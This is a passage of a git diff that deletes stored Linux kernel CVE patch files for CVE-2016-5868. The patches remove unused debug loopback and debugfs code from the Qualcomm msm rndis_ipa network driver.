--	u32 peer_pipe_index;
--	u32 ipa_drv_ep_hdl;
--	u32 ipa_pipe_index;
--	enum ipa_client_type ipa_client;
--	ipa_notify_cb ipa_callback;
--	struct ipa_ep_cfg *ipa_ep_cfg;
--};
- 
- /**
-  * struct rndis_ipa_dev - main driver context parameters
-@@ -169,13 +146,9 @@ struct rndis_loopback_pipe {
-  * @rx_dump_enable: dump all Rx packets
-  * @icmp_filter: allow all ICMP packet to pass through the filters
-  * @rm_enable: flag that enable/disable Resource manager request prior to Tx
-- * @loopback_enable:  flag that enable/disable USB stub loopback
-  * @deaggregation_enable: enable/disable IPA HW deaggregation logic
-  * @during_xmit_error: flags that indicate that the driver is in a middle
-  *  of error handling in Tx path
-- * @usb_to_ipa_loopback_pipe: usb to ipa (Rx) pipe representation for loopback
-- * @ipa_to_usb_loopback_pipe: ipa to usb (Tx) pipe representation for loopback
-- * @bam_dma_hdl: handle representing bam-dma, used for loopback logic
-  * @directory: holds all debug flags used by the driver to allow cleanup
-  *  for driver unload
-  * @eth_ipv4_hdr_hdl: saved handle for ipv4 header-insertion table
-@@ -205,12 +178,8 @@ struct rndis_ipa_dev {
- 	u32 rx_dump_enable;
- 	u32 icmp_filter;
- 	u32 rm_enable;
--	bool loopback_enable;
- 	u32 deaggregation_enable;
- 	u32 during_xmit_error;
--	struct rndis_loopback_pipe usb_to_ipa_loopback_pipe;
--	struct rndis_loopback_pipe ipa_to_usb_loopback_pipe;
--	u32 bam_dma_hdl;
- 	struct dentry *directory;
- 	uint32_t eth_ipv4_hdr_hdl;
- 	uint32_t eth_ipv6_hdr_hdl;
-@@ -274,31 +243,12 @@ static int resource_request(struct rndis_ipa_dev *rndis_ipa_ctx);
- static void resource_release(struct rndis_ipa_dev *rndis_ipa_ctx);
- static netdev_tx_t rndis_ipa_start_xmit(struct sk_buff *skb,
- 					struct net_device *net);
--static int rndis_ipa_loopback_pipe_create(
--		struct rndis_ipa_dev *rndis_ipa_ctx,
--		struct rndis_loopback_pipe *loopback_pipe);
--static void rndis_ipa_destroy_loopback_pipe(
--		struct rndis_loopback_pipe *loopback_pipe);
--static int rndis_ipa_create_loopback(struct rndis_ipa_dev *rndis_ipa_ctx);
--static void rndis_ipa_destroy_loopback(struct rndis_ipa_dev *rndis_ipa_ctx);
--static int rndis_ipa_setup_loopback(bool enable,
--		struct rndis_ipa_dev *rndis_ipa_ctx);
--static int rndis_ipa_debugfs_loopback_open(struct inode *inode,
--		struct file *file);
- static int rndis_ipa_debugfs_atomic_open(struct inode *inode,
- 		struct file *file);
- static int rndis_ipa_debugfs_aggr_open(struct inode *inode,
- 		struct file *file);
- static ssize_t rndis_ipa_debugfs_aggr_write(struct file *file,
- 		const char __user *buf, size_t count, loff_t *ppos);
--static ssize_t rndis_ipa_debugfs_loopback_write(struct file *file,
--		const char __user *buf, size_t count, loff_t *ppos);
--static ssize_t rndis_ipa_debugfs_enable_write(struct file *file,
--		const char __user *buf, size_t count, loff_t *ppos);
--static ssize_t rndis_ipa_debugfs_enable_read(struct file *file,
--		char __user *ubuf, size_t count, loff_t *ppos);
--static ssize_t rndis_ipa_debugfs_loopback_read(struct file *file,
--		char __user *ubuf, size_t count, loff_t *ppos);
- static ssize_t rndis_ipa_debugfs_atomic_read(struct file *file,
- 		char __user *ubuf, size_t count, loff_t *ppos);
- static void rndis_ipa_dump_skb(struct sk_buff *skb);
-@@ -333,12 +283,6 @@ const struct file_operations rndis_ipa_debugfs_atomic_ops = {
- 	.read = rndis_ipa_debugfs_atomic_read,
- };
- 
--const struct file_operations rndis_ipa_loopback_ops = {
--		.open = rndis_ipa_debugfs_loopback_open,
--		.read = rndis_ipa_debugfs_loopback_read,
--		.write = rndis_ipa_debugfs_loopback_write,
--};
--
- const struct file_operations rndis_ipa_aggr_ops = {
- 		.open = rndis_ipa_debugfs_aggr_open,
- 		.write = rndis_ipa_debugfs_aggr_write,
-@@ -2188,14 +2132,6 @@ static int rndis_ipa_debugfs_init(struct rndis_ipa_dev *rndis_ipa_ctx)
- 		goto fail_file;
- 	}
- 
--	file = debugfs_create_file("loopback_enable", flags_read_write,
--				rndis_ipa_ctx->directory,
--				rndis_ipa_ctx, &rndis_ipa_loopback_ops);
--	if (!file) {
--		RNDIS_IPA_ERROR("could not create outstanding file\n");
--		goto fail_file;
--	}
--
- 	file = debugfs_create_u8("state", flags_read_only,
- 			rndis_ipa_ctx->directory, (u8 *)&rndis_ipa_ctx->state);
- 	if (!file) {
-@@ -2351,59 +2287,6 @@ static ssize_t rndis_ipa_debugfs_aggr_write(struct file *file,
- 	return count;
- }
- 
--static int rndis_ipa_debugfs_loopback_open(struct inode *inode,
--		struct file *file)
--{
--	struct rndis_ipa_dev *rndis_ipa_ctx = inode->i_private;
--	file->private_data = rndis_ipa_ctx;
--
--	return 0;
--}
--
--static ssize_t rndis_ipa_debugfs_loopback_read(struct file *file,
--		char __user *ubuf, size_t count, loff_t *ppos)
--{
--	int cnt;
--	struct rndis_ipa_dev *rndis_ipa_ctx = file->private_data;
--
--	file->private_data = &rndis_ipa_ctx->loopback_enable;
--
--	cnt = rndis_ipa_debugfs_enable_read(file,
--			ubuf, count, ppos);
--
--	return cnt;
--}
--
--static ssize_t rndis_ipa_debugfs_loopback_write(struct file *file,
--		const char __user *buf, size_t count, loff_t *ppos)
--{
--	int retval;
--	int cnt;
--	struct rndis_ipa_dev *rndis_ipa_ctx = file->private_data;
--	bool old_state = rndis_ipa_ctx->loopback_enable;
--
--	file->private_data = &rndis_ipa_ctx->loopback_enable;
--
--	cnt = rndis_ipa_debugfs_enable_write(file,
--			buf, count, ppos);
--
--	RNDIS_IPA_DEBUG("loopback_enable was set to:%d->%d\n",
--			old_state, rndis_ipa_ctx->loopback_enable);
--
--	if (old_state == rndis_ipa_ctx->loopback_enable) {
--		RNDIS_IPA_ERROR("NOP - same state\n");
--		return cnt;
--	}
--
--	retval = rndis_ipa_setup_loopback(
--				rndis_ipa_ctx->loopback_enable,
--				rndis_ipa_ctx);
--	if (retval)
--		rndis_ipa_ctx->loopback_enable = old_state;
--
--	return cnt;
--}
--
- static int rndis_ipa_debugfs_atomic_open(struct inode *inode, struct file *file)
- {
- 	struct rndis_ipa_dev *rndis_ipa_ctx = inode->i_private;
-@@ -2434,319 +2317,6 @@ static ssize_t rndis_ipa_debugfs_atomic_read(struct file *file,
- 	return simple_read_from_buffer(ubuf, count, ppos, atomic_str, nbytes);
- }
- 
--static ssize_t rndis_ipa_debugfs_enable_read(struct file *file,
--		char __user *ubuf, size_t count, loff_t *ppos)
--{
--	int nbytes;
--	int size = 0;
--	int ret;
--	loff_t pos;
--	u8 enable_str[sizeof(char)*3] = {0};
--	bool *enable = file->private_data;
--	pos = *ppos;
--	nbytes = scnprintf(enable_str, sizeof(enable_str), "%d\n", *enable);
--	ret = simple_read_from_buffer(ubuf, count, ppos, enable_str, nbytes);
--	if (ret < 0) {
--		RNDIS_IPA_ERROR("simple_read_from_buffer problem\n");
--		return ret;
--	}
--	size += ret;
--	count -= nbytes;
--	*ppos = pos + size;
--	return size;
--}
--
--static ssize_t rndis_ipa_debugfs_enable_write(struct file *file,
--		const char __user *buf, size_t count, loff_t *ppos)
--{
--	unsigned long missing;
--	char input;
--	bool *enable = file->private_data;
--	if (count != sizeof(input) + 1) {
--		RNDIS_IPA_ERROR("wrong input length(%zd)\n", count);
--		return -EINVAL;
--	}
--	if (!buf) {
--		RNDIS_IPA_ERROR("Bad argument\n");
--		return -EINVAL;
--	}
--	missing = copy_from_user(&input, buf, 1);
--	if (missing)
--		return -EFAULT;
--	RNDIS_IPA_DEBUG("input received %c\n", input);
--	*enable = input - '0';
--	RNDIS_IPA_DEBUG("value was set to %d\n", *enable);
--	return count;
--}
--
--/**
-- * Connects IPA->BAMDMA
-- * This shall simulate the path from IPA to USB
-- * Allowing the driver TX path
-- */
--static int rndis_ipa_loopback_pipe_create(
--		struct rndis_ipa_dev *rndis_ipa_ctx,
--		struct rndis_loopback_pipe *loopback_pipe)
--{
--	int retval;
--
--	RNDIS_IPA_LOG_ENTRY();
--
--	/* SPS pipe has two side handshake
--	 * This is the first handshake of IPA->BAMDMA,
--	 * This is the IPA side
--	 */
--	loopback_pipe->ipa_connect_params.client = loopback_pipe->ipa_client;
--	loopback_pipe->ipa_connect_params.client_bam_hdl =
--			rndis_ipa_ctx->bam_dma_hdl;
--	loopback_pipe->ipa_connect_params.client_ep_idx =
--		loopback_pipe->peer_pipe_index;
--	loopback_pipe->ipa_connect_params.desc_fifo_sz = BAM_DMA_DESC_FIFO_SIZE;
--	loopback_pipe->ipa_connect_params.data_fifo_sz = BAM_DMA_DATA_FIFO_SIZE;
--	loopback_pipe->ipa_connect_params.notify = loopback_pipe->ipa_callback;
--	loopback_pipe->ipa_connect_params.priv = rndis_ipa_ctx;
--	loopback_pipe->ipa_connect_params.ipa_ep_cfg =
--		*(loopback_pipe->ipa_ep_cfg);
--
--	/* loopback_pipe->ipa_sps_connect is out param */
--	retval = ipa_connect(&loopback_pipe->ipa_connect_params,
--			&loopback_pipe->ipa_sps_connect,
--			&loopback_pipe->ipa_drv_ep_hdl);
--	if (retval) {
--		RNDIS_IPA_ERROR("ipa_connect() fail (%d)", retval);
--		return retval;
--	}
--	RNDIS_IPA_DEBUG("ipa_connect() succeeded, ipa_drv_ep_hdl=%d",
--			loopback_pipe->ipa_drv_ep_hdl);
--
--	/* SPS pipe has two side handshake
--	 * This is the second handshake of IPA->BAMDMA,
--	 * This is the BAMDMA side
--	 */
--	loopback_pipe->dma_sps = sps_alloc_endpoint();
--	if (!loopback_pipe->dma_sps) {
--		RNDIS_IPA_ERROR("sps_alloc_endpoint() failed ");
--		retval = -ENOMEM;
--		goto fail_sps_alloc;
--	}
--
--	retval = sps_get_config(loopback_pipe->dma_sps,
--		&loopback_pipe->dma_connect);
--	if (retval) {
--		RNDIS_IPA_ERROR("sps_get_config() failed (%d)", retval);
--		goto fail_get_cfg;
--	}
--
--	/* Start setting the non IPA ep for SPS driver*/
--	loopback_pipe->dma_connect.mode = loopback_pipe->mode;
--
--	/* SPS_MODE_DEST: DMA end point is the dest (consumer) IPA->DMA */
--	if (loopback_pipe->mode == SPS_MODE_DEST) {
--
--		loopback_pipe->dma_connect.source =
--				loopback_pipe->ipa_sps_connect.ipa_bam_hdl;
--		loopback_pipe->dma_connect.src_pipe_index =
--				loopback_pipe->ipa_sps_connect.ipa_ep_idx;
--		loopback_pipe->dma_connect.destination =
--				rndis_ipa_ctx->bam_dma_hdl;
--		loopback_pipe->dma_connect.dest_pipe_index =
--				loopback_pipe->peer_pipe_index;
--
--	/* SPS_MODE_SRC: DMA end point is the source (producer) DMA->IPA */
--	} else {
--
--		loopback_pipe->dma_connect.source =
--				rndis_ipa_ctx->bam_dma_hdl;
--		loopback_pipe->dma_connect.src_pipe_index =
--				loopback_pipe->peer_pipe_index;
--		loopback_pipe->dma_connect.destination =
--				loopback_pipe->ipa_sps_connect.ipa_bam_hdl;
--		loopback_pipe->dma_connect.dest_pipe_index =
--				loopback_pipe->ipa_sps_connect.ipa_ep_idx;
--
--	}
--
--	loopback_pipe->dma_connect.desc = loopback_pipe->ipa_sps_connect.desc;
--	loopback_pipe->dma_connect.data = loopback_pipe->ipa_sps_connect.data;
--	loopback_pipe->dma_connect.event_thresh = 0x10;
--	/* BAM-to-BAM */
--	loopback_pipe->dma_connect.options = SPS_O_AUTO_ENABLE;
--
--	RNDIS_IPA_DEBUG("doing sps_connect() with - ");
--	RNDIS_IPA_DEBUG("src bam_hdl:0x%lx, src_pipe#:%d",
--			loopback_pipe->dma_connect.source,
--			loopback_pipe->dma_connect.src_pipe_index);
--	RNDIS_IPA_DEBUG("dst bam_hdl:0x%lx, dst_pipe#:%d",
--			loopback_pipe->dma_connect.destination,
--			loopback_pipe->dma_connect.dest_pipe_index);
--
--	retval = sps_connect(loopback_pipe->dma_sps,
--		&loopback_pipe->dma_connect);
--	if (retval) {
--		RNDIS_IPA_ERROR("sps_connect() fail for BAMDMA side (%d)",
--			retval);
--		goto fail_sps_connect;
--	}
--
--	RNDIS_IPA_LOG_EXIT();
--
--	return 0;
--
--fail_sps_connect:
--fail_get_cfg:
--	sps_free_endpoint(loopback_pipe->dma_sps);
--fail_sps_alloc:
--	ipa_disconnect(loopback_pipe->ipa_drv_ep_hdl);
--	return retval;
--}
--
--static void rndis_ipa_destroy_loopback_pipe(
--		struct rndis_loopback_pipe *loopback_pipe)
--{
--	sps_disconnect(loopback_pipe->dma_sps);
--	sps_free_endpoint(loopback_pipe->dma_sps);
--}
--
--/**
-- * rndis_ipa_create_loopback() - create a BAM-DMA loopback
-- *  in order to replace the USB core
-- */
--static int rndis_ipa_create_loopback(struct rndis_ipa_dev *rndis_ipa_ctx)
--{
--	/* The BAM handle should be use as
--	 * source/destination in the sps_connect()
--	 */
--	int retval;
--
--	RNDIS_IPA_LOG_ENTRY();
--
--
--	retval = sps_ctrl_bam_dma_clk(true);
--	if (retval) {
--		RNDIS_IPA_ERROR("fail on enabling BAM-DMA clocks");
--		return -ENODEV;
--	}
--
--	/* Get BAM handle instead of USB handle */
--	rndis_ipa_ctx->bam_dma_hdl = sps_dma_get_bam_handle();
--	if (!rndis_ipa_ctx->bam_dma_hdl) {
--		RNDIS_IPA_ERROR("sps_dma_get_bam_handle() failed");
--		return -ENODEV;
--	}
--	RNDIS_IPA_DEBUG("sps_dma_get_bam_handle() succeeded (0x%x)",
--			rndis_ipa_ctx->bam_dma_hdl);
--
--	/* IPA<-BAMDMA, NetDev Rx path (BAMDMA is the USB stub) */
--	rndis_ipa_ctx->usb_to_ipa_loopback_pipe.ipa_client =
--	IPA_CLIENT_USB_PROD;
--	rndis_ipa_ctx->usb_to_ipa_loopback_pipe.peer_pipe_index =
--		FROM_USB_TO_IPA_BAMDMA;
--	/*DMA EP mode*/
--	rndis_ipa_ctx->usb_to_ipa_loopback_pipe.mode = SPS_MODE_SRC;
--	rndis_ipa_ctx->usb_to_ipa_loopback_pipe.ipa_ep_cfg =
--		&usb_to_ipa_ep_cfg_deaggr_en;
--	rndis_ipa_ctx->usb_to_ipa_loopback_pipe.ipa_callback =
--			rndis_ipa_packet_receive_notify;
--	RNDIS_IPA_DEBUG("setting up IPA<-BAMDAM pipe (RNDIS_IPA RX path)");
--	retval = rndis_ipa_loopback_pipe_create(rndis_ipa_ctx,
--			&rndis_ipa_ctx->usb_to_ipa_loopback_pipe);
--	if (retval) {
--		RNDIS_IPA_ERROR("fail to close IPA->BAMDAM pipe");
--		goto fail_to_usb;
--	}
--	RNDIS_IPA_DEBUG("IPA->BAMDAM pipe successfully connected (TX path)");
--
--	/* IPA->BAMDMA, NetDev Tx path (BAMDMA is the USB stub)*/
--	rndis_ipa_ctx->ipa_to_usb_loopback_pipe.ipa_client =
--		IPA_CLIENT_USB_CONS;
--	/*DMA EP mode*/
--	rndis_ipa_ctx->ipa_to_usb_loopback_pipe.mode = SPS_MODE_DEST;
--	rndis_ipa_ctx->ipa_to_usb_loopback_pipe.ipa_ep_cfg = &ipa_to_usb_ep_cfg;
--	rndis_ipa_ctx->ipa_to_usb_loopback_pipe.peer_pipe_index =
--		FROM_IPA_TO_USB_BAMDMA;
--	rndis_ipa_ctx->ipa_to_usb_loopback_pipe.ipa_callback =
--			rndis_ipa_tx_complete_notify;
--	RNDIS_IPA_DEBUG("setting up IPA->BAMDAM pipe (RNDIS_IPA TX path)");
--	retval = rndis_ipa_loopback_pipe_create(rndis_ipa_ctx,
--			&rndis_ipa_ctx->ipa_to_usb_loopback_pipe);
--	if (retval) {
--		RNDIS_IPA_ERROR("fail to close IPA<-BAMDAM pipe");
--		goto fail_from_usb;
--	}
--	RNDIS_IPA_DEBUG("IPA<-BAMDAM pipe successfully connected(RX path)");
--
--	RNDIS_IPA_LOG_EXIT();
--
--	return 0;
--
--fail_from_usb:
--	rndis_ipa_destroy_loopback_pipe(
--			&rndis_ipa_ctx->usb_to_ipa_loopback_pipe);
--fail_to_usb:
--
--	return retval;
--}
--
--static void rndis_ipa_destroy_loopback(struct rndis_ipa_dev *rndis_ipa_ctx)
--{
--	rndis_ipa_destroy_loopback_pipe(
--			&rndis_ipa_ctx->ipa_to_usb_loopback_pipe);
--	rndis_ipa_destroy_loopback_pipe(
--			&rndis_ipa_ctx->usb_to_ipa_loopback_pipe);
--	sps_dma_free_bam_handle(rndis_ipa_ctx->bam_dma_hdl);
--	if (sps_ctrl_bam_dma_clk(false))
--		RNDIS_IPA_ERROR("fail to disable BAM-DMA clocks");
--}
--
--/**
-- * rndis_ipa_setup_loopback() - create/destroy a loopback on IPA HW
-- *  (as USB pipes loopback) and notify RNDIS_IPA netdev for pipe connected
-- * @enable: flag that determines if the loopback should be created or destroyed
-- * @rndis_ipa_ctx: driver main context
-- *
-- * This function is the main loopback logic.
-- * It shall create/destory the loopback by using BAM-DMA and notify
-- * the netdev accordingly.
-- */
--static int rndis_ipa_setup_loopback(bool enable,
--		struct rndis_ipa_dev *rndis_ipa_ctx)
--{
--	int retval;
--
--	if (!enable) {
--		rndis_ipa_destroy_loopback(rndis_ipa_ctx);
--		RNDIS_IPA_DEBUG("loopback destroy done");
--		retval = rndis_ipa_pipe_disconnect_notify(rndis_ipa_ctx);
--		if (retval) {
--			RNDIS_IPA_ERROR("connect notify fail");
--			return -ENODEV;
--		}
--		return 0;
--	}
--
--	RNDIS_IPA_DEBUG("creating loopback (instead of USB core)");
--	retval = rndis_ipa_create_loopback(rndis_ipa_ctx);
--	RNDIS_IPA_DEBUG("creating loopback- %s", (retval ? "FAIL" : "OK"));
--	if (retval) {
--		RNDIS_IPA_ERROR("Fail to connect loopback");
--		return -ENODEV;
--	}
--	retval = rndis_ipa_pipe_connect_notify(
--			rndis_ipa_ctx->usb_to_ipa_loopback_pipe.ipa_drv_ep_hdl,
--			rndis_ipa_ctx->ipa_to_usb_loopback_pipe.ipa_drv_ep_hdl,
--			BAM_DMA_DATA_FIFO_SIZE,
--			15,
--			BAM_DMA_DATA_FIFO_SIZE - rndis_ipa_ctx->net->mtu,
--			rndis_ipa_ctx);
--	if (retval) {
--		RNDIS_IPA_ERROR("connect notify fail");
--		return -ENODEV;
--	}
--
--	return 0;
--
--}
--
- static int rndis_ipa_init_module(void)
- {
- 	pr_info("RNDIS_IPA module is loaded.");
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5868/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-5868/3.18/0002.patch
deleted file mode 100644
index df9b3317..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5868/3.18/0002.patch
+++ /dev/null
@@ -1,519 +0,0 @@
-From 0ada77c044be09db1a35e4718209f41d05d27fe0 Mon Sep 17 00:00:00 2001
-From: Ghanim Fodi <gfodi@codeaurora.org>
-Date: Tue, 27 Dec 2016 13:32:35 +0200
-Subject: msm: rndis_ipa: Remove rndis_ipa loopback functionality
-
-Rndis_ipa loopback functionality at rndis_ipa driver
-is a debug functionality that is not used.
-
-Change-Id: Ibbcb26d3871cffeb46b028efcf4d428e88eb9e10
-CRs-fixed: 1104431
-Signed-off-by: Ghanim Fodi <gfodi@codeaurora.org>
----
- drivers/net/ethernet/msm/rndis_ipa.c | 430 -----------------------------------
- 1 file changed, 430 deletions(-)
-
-diff --git a/drivers/net/ethernet/msm/rndis_ipa.c b/drivers/net/ethernet/msm/rndis_ipa.c
-index e411693..179e708 100644
---- a/drivers/net/ethernet/msm/rndis_ipa.c
-+++ b/drivers/net/ethernet/msm/rndis_ipa.c
-@@ -135,29 +135,6 @@ enum rndis_ipa_operation {
- 	RNDIS_IPA_DEBUG("Driver state: %s\n",\
- 	rndis_ipa_state_string(ctx->state));
- 
--/**
-- * struct rndis_loopback_pipe - hold all information needed for
-- *  pipe loopback logic
-- */
--struct rndis_loopback_pipe {
--	struct sps_pipe          *ipa_sps;
--	struct ipa_sps_params ipa_sps_connect;
--	struct ipa_connect_params ipa_connect_params;
--
--	struct sps_pipe          *dma_sps;
--	struct sps_connect        dma_connect;
--
--	struct sps_alloc_dma_chan dst_alloc;
--	struct sps_dma_chan       ipa_sps_channel;
--	enum sps_mode mode;
--	u32 ipa_peer_bam_hdl;
--	u32 peer_pipe_index;
--	u32 ipa_drv_ep_hdl;
--	u32 ipa_pipe_index;
--	enum ipa_client_type ipa_client;
--	ipa_notify_cb ipa_callback;
--	struct ipa_ep_cfg *ipa_ep_cfg;
--};
- 
- /**
-  * struct rndis_ipa_dev - main driver context parameters
-@@ -172,13 +149,9 @@ struct rndis_loopback_pipe {
-  * @rx_dump_enable: dump all Rx packets
-  * @icmp_filter: allow all ICMP packet to pass through the filters
-  * @rm_enable: flag that enable/disable Resource manager request prior to Tx
-- * @loopback_enable:  flag that enable/disable USB stub loopback
-  * @deaggregation_enable: enable/disable IPA HW deaggregation logic
-  * @during_xmit_error: flags that indicate that the driver is in a middle
-  *  of error handling in Tx path
-- * @usb_to_ipa_loopback_pipe: usb to ipa (Rx) pipe representation for loopback
-- * @ipa_to_usb_loopback_pipe: ipa to usb (Tx) pipe representation for loopback
-- * @bam_dma_hdl: handle representing bam-dma, used for loopback logic
-  * @directory: holds all debug flags used by the driver to allow cleanup
-  *  for driver unload
-  * @eth_ipv4_hdr_hdl: saved handle for ipv4 header-insertion table
-@@ -209,12 +182,8 @@ struct rndis_ipa_dev {
- 	u32 rx_dump_enable;
- 	u32 icmp_filter;
- 	u32 rm_enable;
--	bool loopback_enable;
- 	u32 deaggregation_enable;
- 	u32 during_xmit_error;
--	struct rndis_loopback_pipe usb_to_ipa_loopback_pipe;
--	struct rndis_loopback_pipe ipa_to_usb_loopback_pipe;
--	u32 bam_dma_hdl;
- 	struct dentry *directory;
- 	uint32_t eth_ipv4_hdr_hdl;
- 	uint32_t eth_ipv6_hdr_hdl;
-@@ -279,31 +248,12 @@ static int resource_request(struct rndis_ipa_dev *rndis_ipa_ctx);
- static void resource_release(struct rndis_ipa_dev *rndis_ipa_ctx);
- static netdev_tx_t rndis_ipa_start_xmit(struct sk_buff *skb,
- 					struct net_device *net);
--static int rndis_ipa_loopback_pipe_create(
--		struct rndis_ipa_dev *rndis_ipa_ctx,
--		struct rndis_loopback_pipe *loopback_pipe);
--static void rndis_ipa_destroy_loopback_pipe(
--		struct rndis_loopback_pipe *loopback_pipe);
--static int rndis_ipa_create_loopback(struct rndis_ipa_dev *rndis_ipa_ctx);
--static void rndis_ipa_destroy_loopback(struct rndis_ipa_dev *rndis_ipa_ctx);
--static int rndis_ipa_setup_loopback(bool enable,
--		struct rndis_ipa_dev *rndis_ipa_ctx);
--static int rndis_ipa_debugfs_loopback_open(struct inode *inode,
--		struct file *file);
- static int rndis_ipa_debugfs_atomic_open(struct inode *inode,
- 		struct file *file);
- static int rndis_ipa_debugfs_aggr_open(struct inode *inode,
- 		struct file *file);
- static ssize_t rndis_ipa_debugfs_aggr_write(struct file *file,
- 		const char __user *buf, size_t count, loff_t *ppos);
--static ssize_t rndis_ipa_debugfs_loopback_write(struct file *file,
--		const char __user *buf, size_t count, loff_t *ppos);
--static ssize_t rndis_ipa_debugfs_enable_write(struct file *file,
--		const char __user *buf, size_t count, loff_t *ppos);
--static ssize_t rndis_ipa_debugfs_enable_read(struct file *file,
--		char __user *ubuf, size_t count, loff_t *ppos);
--static ssize_t rndis_ipa_debugfs_loopback_read(struct file *file,
--		char __user *ubuf, size_t count, loff_t *ppos);
- static ssize_t rndis_ipa_debugfs_atomic_read(struct file *file,
- 		char __user *ubuf, size_t count, loff_t *ppos);
- static void rndis_ipa_dump_skb(struct sk_buff *skb);
-@@ -338,12 +288,6 @@ const struct file_operations rndis_ipa_debugfs_atomic_ops = {
- 	.read = rndis_ipa_debugfs_atomic_read,
- };
- 
--const struct file_operations rndis_ipa_loopback_ops = {
--		.open = rndis_ipa_debugfs_loopback_open,
--		.read = rndis_ipa_debugfs_loopback_read,
--		.write = rndis_ipa_debugfs_loopback_write,
--};
--
- const struct file_operations rndis_ipa_aggr_ops = {
- 		.open = rndis_ipa_debugfs_aggr_open,
- 		.write = rndis_ipa_debugfs_aggr_write,
-@@ -2253,14 +2197,6 @@ static void rndis_ipa_debugfs_init(struct rndis_ipa_dev *rndis_ipa_ctx)
- 		goto fail_file;
- 	}
- 
--	file = debugfs_create_file("loopback_enable", flags_read_write,
--				rndis_ipa_ctx->directory,
--				rndis_ipa_ctx, &rndis_ipa_loopback_ops);
--	if (!file) {
--		RNDIS_IPA_ERROR("could not create outstanding file\n");
--		goto fail_file;
--	}
--
- 	file = debugfs_create_u8("state", flags_read_only,
- 			rndis_ipa_ctx->directory, (u8 *)&rndis_ipa_ctx->state);
- 	if (!file) {
-@@ -2424,59 +2360,6 @@ static ssize_t rndis_ipa_debugfs_aggr_write(struct file *file,
- 	return count;
- }
- 
--static int rndis_ipa_debugfs_loopback_open(struct inode *inode,
--		struct file *file)
--{
--	struct rndis_ipa_dev *rndis_ipa_ctx = inode->i_private;
--	file->private_data = rndis_ipa_ctx;
--
--	return 0;
--}
--
--static ssize_t rndis_ipa_debugfs_loopback_read(struct file *file,
--		char __user *ubuf, size_t count, loff_t *ppos)
--{
--	int cnt;
--	struct rndis_ipa_dev *rndis_ipa_ctx = file->private_data;
--
--	file->private_data = &rndis_ipa_ctx->loopback_enable;
--
--	cnt = rndis_ipa_debugfs_enable_read(file,
--			ubuf, count, ppos);
--
--	return cnt;
--}
--
--static ssize_t rndis_ipa_debugfs_loopback_write(struct file *file,
--		const char __user *buf, size_t count, loff_t *ppos)
--{
--	int retval;
--	int cnt;
--	struct rndis_ipa_dev *rndis_ipa_ctx = file->private_data;
--	bool old_state = rndis_ipa_ctx->loopback_enable;
--
--	file->private_data = &rndis_ipa_ctx->loopback_enable;
--
--	cnt = rndis_ipa_debugfs_enable_write(file,
--			buf, count, ppos);
--
--	RNDIS_IPA_DEBUG("loopback_enable was set to:%d->%d\n",
--			old_state, rndis_ipa_ctx->loopback_enable);
--
--	if (old_state == rndis_ipa_ctx->loopback_enable) {
--		RNDIS_IPA_ERROR("NOP - same state\n");
--		return cnt;
--	}
--
--	retval = rndis_ipa_setup_loopback(
--				rndis_ipa_ctx->loopback_enable,
--				rndis_ipa_ctx);
--	if (retval)
--		rndis_ipa_ctx->loopback_enable = old_state;
--
--	return cnt;
--}
--
- static int rndis_ipa_debugfs_atomic_open(struct inode *inode, struct file *file)
- {
- 	struct rndis_ipa_dev *rndis_ipa_ctx = inode->i_private;
-@@ -2507,319 +2390,6 @@ static ssize_t rndis_ipa_debugfs_atomic_read(struct file *file,
- 	return simple_read_from_buffer(ubuf, count, ppos, atomic_str, nbytes);
- }
- 
--static ssize_t rndis_ipa_debugfs_enable_read(struct file *file,
--		char __user *ubuf, size_t count, loff_t *ppos)
--{
--	int nbytes;
--	int size = 0;
--	int ret;
--	loff_t pos;
--	u8 enable_str[sizeof(char)*3] = {0};
--	bool *enable = file->private_data;
--	pos = *ppos;
--	nbytes = scnprintf(enable_str, sizeof(enable_str), "%d\n", *enable);
--	ret = simple_read_from_buffer(ubuf, count, ppos, enable_str, nbytes);
--	if (ret < 0) {
--		RNDIS_IPA_ERROR("simple_read_from_buffer problem\n");
--		return ret;
--	}
--	size += ret;
--	count -= nbytes;
--	*ppos = pos + size;
--	return size;
--}
--
--static ssize_t rndis_ipa_debugfs_enable_write(struct file *file,
--		const char __user *buf, size_t count, loff_t *ppos)
--{
--	unsigned long missing;
--	char input;
--	bool *enable = file->private_data;
--	if (count != sizeof(input) + 1) {
--		RNDIS_IPA_ERROR("wrong input length(%zd)\n", count);
--		return -EINVAL;
--	}
--	if (!buf) {
--		RNDIS_IPA_ERROR("Bad argument\n");
--		return -EINVAL;
--	}
--	missing = copy_from_user(&input, buf, 1);
--	if (missing)
--		return -EFAULT;
--	RNDIS_IPA_DEBUG("input received %c\n", input);
--	*enable = input - '0';
--	RNDIS_IPA_DEBUG("value was set to %d\n", *enable);
--	return count;
--}
--
--/**
-- * Connects IPA->BAMDMA
-- * This shall simulate the path from IPA to USB
-- * Allowing the driver TX path
-- */
--static int rndis_ipa_loopback_pipe_create(
--		struct rndis_ipa_dev *rndis_ipa_ctx,
--		struct rndis_loopback_pipe *loopback_pipe)
--{
--	int retval;
--
--	RNDIS_IPA_LOG_ENTRY();
--
--	/* SPS pipe has two side handshake
--	 * This is the first handshake of IPA->BAMDMA,
--	 * This is the IPA side
--	 */
--	loopback_pipe->ipa_connect_params.client = loopback_pipe->ipa_client;
--	loopback_pipe->ipa_connect_params.client_bam_hdl =
--			rndis_ipa_ctx->bam_dma_hdl;
--	loopback_pipe->ipa_connect_params.client_ep_idx =
--		loopback_pipe->peer_pipe_index;
--	loopback_pipe->ipa_connect_params.desc_fifo_sz = BAM_DMA_DESC_FIFO_SIZE;
--	loopback_pipe->ipa_connect_params.data_fifo_sz = BAM_DMA_DATA_FIFO_SIZE;
--	loopback_pipe->ipa_connect_params.notify = loopback_pipe->ipa_callback;
--	loopback_pipe->ipa_connect_params.priv = rndis_ipa_ctx;
--	loopback_pipe->ipa_connect_params.ipa_ep_cfg =
--		*(loopback_pipe->ipa_ep_cfg);
--
--	/* loopback_pipe->ipa_sps_connect is out param */
--	retval = ipa_connect(&loopback_pipe->ipa_connect_params,
--			&loopback_pipe->ipa_sps_connect,
--			&loopback_pipe->ipa_drv_ep_hdl);
--	if (retval) {
--		RNDIS_IPA_ERROR("ipa_connect() fail (%d)", retval);
--		return retval;
--	}
--	RNDIS_IPA_DEBUG("ipa_connect() succeeded, ipa_drv_ep_hdl=%d",
--			loopback_pipe->ipa_drv_ep_hdl);
--
--	/* SPS pipe has two side handshake
--	 * This is the second handshake of IPA->BAMDMA,
